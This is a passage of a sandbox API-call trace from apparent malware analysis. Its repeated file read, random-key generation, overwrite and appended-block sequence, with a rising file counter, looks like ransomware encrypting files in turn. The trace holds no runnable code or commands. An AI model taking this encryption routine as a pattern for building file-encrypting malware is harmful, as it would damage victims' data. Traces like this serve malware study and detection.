hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.165] GetProcessHeap () returned 0x4f10000 [0083.165] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.165] GetProcessHeap () returned 0x4f10000 [0083.165] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.165] GetProcessHeap () returned 0x4f10000 [0083.165] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.165] GetProcessHeap () returned 0x4f10000 [0083.165] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.165] GetProcessHeap () returned 0x4f10000 [0083.165] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.165] GetProcessHeap () returned 0x4f10000 [0083.165] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.165] GetProcessHeap () returned 0x4f10000 [0083.165] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.165] GetProcessHeap () returned 0x4f10000 [0083.165] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.165] SetFilePointerEx (in: hFile=0x90c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.165] WriteFile (in: hFile=0x90c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.166] WriteFile (in: hFile=0x90c, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.166] GetProcessHeap () returned 0x4f10000 [0083.166] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.166] GetProcessHeap () returned 0x4f10000 [0083.166] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.166] GetProcessHeap () returned 0x4f10000 [0083.166] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.166] CloseHandle (hObject=0x90c) returned 1 [0083.166] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 99 [0083.166] SetFilePointerEx (in: hFile=0x910, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.166] ReadFile (in: hFile=0x910, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.167] SetFilePointerEx (in: hFile=0x910, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.167] GetProcessHeap () returned 0x4f10000 [0083.167] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.167] GetProcessHeap () returned 0x4f10000 [0083.167] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.167] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.167] GetProcessHeap () returned 0x4f10000 [0083.167] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.167] ReadFile (in: hFile=0x910, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0xec, lpOverlapped=0x0) returned 1 [0083.170] SetFilePointerEx (in: hFile=0x910, liDistanceToMove=0xffffff14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.171] WriteFile (in: hFile=0x910, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0xec, lpOverlapped=0x0) returned 1 [0083.171] GetProcessHeap () returned 0x4f10000 [0083.171] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.171] GetProcessHeap () returned 0x4f10000 [0083.171] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.171] GetProcessHeap () returned 0x4f10000 [0083.171] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.171] GetProcessHeap () returned 0x4f10000 [0083.171] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.171] GetProcessHeap () returned 0x4f10000 [0083.171] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.171] GetProcessHeap () returned 0x4f10000 [0083.171] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.171] GetProcessHeap () returned 0x4f10000 [0083.171] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.171] GetProcessHeap () returned 0x4f10000 [0083.171] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.171] GetProcessHeap () returned 0x4f10000 [0083.171] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.171] GetProcessHeap () returned 0x4f10000 [0083.171] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.171] GetProcessHeap () returned 0x4f10000 [0083.171] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.171] GetProcessHeap () returned 0x4f10000 [0083.171] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.171] GetProcessHeap () returned 0x4f10000 [0083.171] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.171] GetProcessHeap () returned 0x4f10000 [0083.171] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.171] GetProcessHeap () returned 0x4f10000 [0083.171] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.171] GetProcessHeap () returned 0x4f10000 [0083.171] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.171] GetProcessHeap () returned 0x4f10000 [0083.171] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.171] GetProcessHeap () returned 0x4f10000 [0083.171] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.172] GetProcessHeap () returned 0x4f10000 [0083.172] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.172] GetProcessHeap () returned 0x4f10000 [0083.172] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.172] GetProcessHeap () returned 0x4f10000 [0083.172] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.172] GetProcessHeap () returned 0x4f10000 [0083.172] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.172] GetProcessHeap () returned 0x4f10000 [0083.172] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.172] GetProcessHeap () returned 0x4f10000 [0083.172] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.172] GetProcessHeap () returned 0x4f10000 [0083.172] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.172] GetProcessHeap () returned 0x4f10000 [0083.172] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.172] GetProcessHeap () returned 0x4f10000 [0083.172] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.172] GetProcessHeap () returned 0x4f10000 [0083.172] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.172] GetProcessHeap () returned 0x4f10000 [0083.172] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.172] GetProcessHeap () returned 0x4f10000 [0083.172] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.172] GetProcessHeap () returned 0x4f10000 [0083.172] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.172] GetProcessHeap () returned 0x4f10000 [0083.172] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.172] GetProcessHeap () returned 0x4f10000 [0083.172] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.172] GetProcessHeap () returned 0x4f10000 [0083.172] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.172] GetProcessHeap () returned 0x4f10000 [0083.172] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.172] GetProcessHeap () returned 0x4f10000 [0083.172] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.172] GetProcessHeap () returned 0x4f10000 [0083.172] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.172] GetProcessHeap () returned 0x4f10000 [0083.172] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.172] GetProcessHeap () returned 0x4f10000 [0083.173] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.173] GetProcessHeap () returned 0x4f10000 [0083.173] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.173] GetProcessHeap () returned 0x4f10000 [0083.173] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.173] GetProcessHeap () returned 0x4f10000 [0083.173] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.173] GetProcessHeap () returned 0x4f10000 [0083.173] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.173] GetProcessHeap () returned 0x4f10000 [0083.173] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.173] GetProcessHeap () returned 0x4f10000 [0083.173] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.173] GetProcessHeap () returned 0x4f10000 [0083.173] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.173] GetProcessHeap () returned 0x4f10000 [0083.173] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.173] GetProcessHeap () returned 0x4f10000 [0083.173] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.173] GetProcessHeap () returned 0x4f10000 [0083.173] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.173] GetProcessHeap () returned 0x4f10000 [0083.173] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.173] GetProcessHeap () returned 0x4f10000 [0083.173] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.173] GetProcessHeap () returned 0x4f10000 [0083.173] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.173] GetProcessHeap () returned 0x4f10000 [0083.173] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.173] GetProcessHeap () returned 0x4f10000 [0083.173] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.173] GetProcessHeap () returned 0x4f10000 [0083.173] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.173] GetProcessHeap () returned 0x4f10000 [0083.174] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.174] GetProcessHeap () returned 0x4f10000 [0083.174] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.174] GetProcessHeap () returned 0x4f10000 [0083.174] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.174] GetProcessHeap () returned 0x4f10000 [0083.174] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.174] GetProcessHeap () returned 0x4f10000 [0083.174] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.174] GetProcessHeap () returned 0x4f10000 [0083.174] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.174] GetProcessHeap () returned 0x4f10000 [0083.174] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.174] GetProcessHeap () returned 0x4f10000 [0083.174] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.174] GetProcessHeap () returned 0x4f10000 [0083.174] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.174] GetProcessHeap () returned 0x4f10000 [0083.174] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.174] GetProcessHeap () returned 0x4f10000 [0083.174] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.174] GetProcessHeap () returned 0x4f10000 [0083.174] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.174] GetProcessHeap () returned 0x4f10000 [0083.174] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.174] GetProcessHeap () returned 0x4f10000 [0083.174] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.174] GetProcessHeap () returned 0x4f10000 [0083.174] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.175] GetProcessHeap () returned 0x4f10000 [0083.175] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.175] GetProcessHeap () returned 0x4f10000 [0083.175] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.175] GetProcessHeap () returned 0x4f10000 [0083.175] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.175] GetProcessHeap () returned 0x4f10000 [0083.175] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.175] GetProcessHeap () returned 0x4f10000 [0083.175] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.175] GetProcessHeap () returned 0x4f10000 [0083.175] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.175] GetProcessHeap () returned 0x4f10000 [0083.175] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.175] GetProcessHeap () returned 0x4f10000 [0083.175] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.175] SetFilePointerEx (in: hFile=0x910, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.175] WriteFile (in: hFile=0x910, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.175] WriteFile (in: hFile=0x910, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.175] GetProcessHeap () returned 0x4f10000 [0083.175] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.175] GetProcessHeap () returned 0x4f10000 [0083.175] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.175] GetProcessHeap () returned 0x4f10000 [0083.175] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.175] CloseHandle (hObject=0x910) returned 1 [0083.176] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 100 [0083.176] SetFilePointerEx (in: hFile=0x914, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.176] ReadFile (in: hFile=0x914, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.176] SetFilePointerEx (in: hFile=0x914, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.176] GetProcessHeap () returned 0x4f10000 [0083.176] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.176] GetProcessHeap () returned 0x4f10000 [0083.176] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.176] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.176] GetProcessHeap () returned 0x4f10000 [0083.176] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.176] ReadFile (in: hFile=0x914, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0xe2, lpOverlapped=0x0) returned 1 [0083.180] SetFilePointerEx (in: hFile=0x914, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.180] WriteFile (in: hFile=0x914, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0xe2, lpOverlapped=0x0) returned 1 [0083.180] GetProcessHeap () returned 0x4f10000 [0083.180] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.180] GetProcessHeap () returned 0x4f10000 [0083.180] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.180] GetProcessHeap () returned 0x4f10000 [0083.180] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.180] GetProcessHeap () returned 0x4f10000 [0083.180] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.180] GetProcessHeap () returned 0x4f10000 [0083.181] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.181] GetProcessHeap () returned 0x4f10000 [0083.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.181] GetProcessHeap () returned 0x4f10000 [0083.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.181] GetProcessHeap () returned 0x4f10000 [0083.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.181] GetProcessHeap () returned 0x4f10000 [0083.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.181] GetProcessHeap () returned 0x4f10000 [0083.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.181] GetProcessHeap () returned 0x4f10000 [0083.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.181] GetProcessHeap () returned 0x4f10000 [0083.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.181] GetProcessHeap () returned 0x4f10000 [0083.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.181] GetProcessHeap () returned 0x4f10000 [0083.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.181] GetProcessHeap () returned 0x4f10000 [0083.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.181] GetProcessHeap () returned 0x4f10000 [0083.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.181] GetProcessHeap () returned 0x4f10000 [0083.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.181] GetProcessHeap () returned 0x4f10000 [0083.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.181] GetProcessHeap () returned 0x4f10000 [0083.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.181] GetProcessHeap () returned 0x4f10000 [0083.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.181] GetProcessHeap () returned 0x4f10000 [0083.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.181] GetProcessHeap () returned 0x4f10000 [0083.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.181] GetProcessHeap () returned 0x4f10000 [0083.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.181] GetProcessHeap () returned 0x4f10000 [0083.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.181] GetProcessHeap () returned 0x4f10000 [0083.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.182] GetProcessHeap () returned 0x4f10000 [0083.182] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.182] GetProcessHeap () returned 0x4f10000 [0083.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.182] GetProcessHeap () returned 0x4f10000 [0083.182] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.182] GetProcessHeap () returned 0x4f10000 [0083.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.182] GetProcessHeap () returned 0x4f10000 [0083.182] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.182] GetProcessHeap () returned 0x4f10000 [0083.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.182] GetProcessHeap () returned 0x4f10000 [0083.182] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.182] GetProcessHeap () returned 0x4f10000 [0083.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.182] GetProcessHeap () returned 0x4f10000 [0083.182] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.182] GetProcessHeap () returned 0x4f10000 [0083.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.182] GetProcessHeap () returned 0x4f10000 [0083.182] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.182] GetProcessHeap () returned 0x4f10000 [0083.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.182] GetProcessHeap () returned 0x4f10000 [0083.182] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.182] GetProcessHeap () returned 0x4f10000 [0083.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.182] GetProcessHeap () returned 0x4f10000 [0083.182] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.182] GetProcessHeap () returned 0x4f10000 [0083.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.182] GetProcessHeap () returned 0x4f10000 [0083.182] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.182] GetProcessHeap () returned 0x4f10000 [0083.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.182] GetProcessHeap () returned 0x4f10000 [0083.182] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: 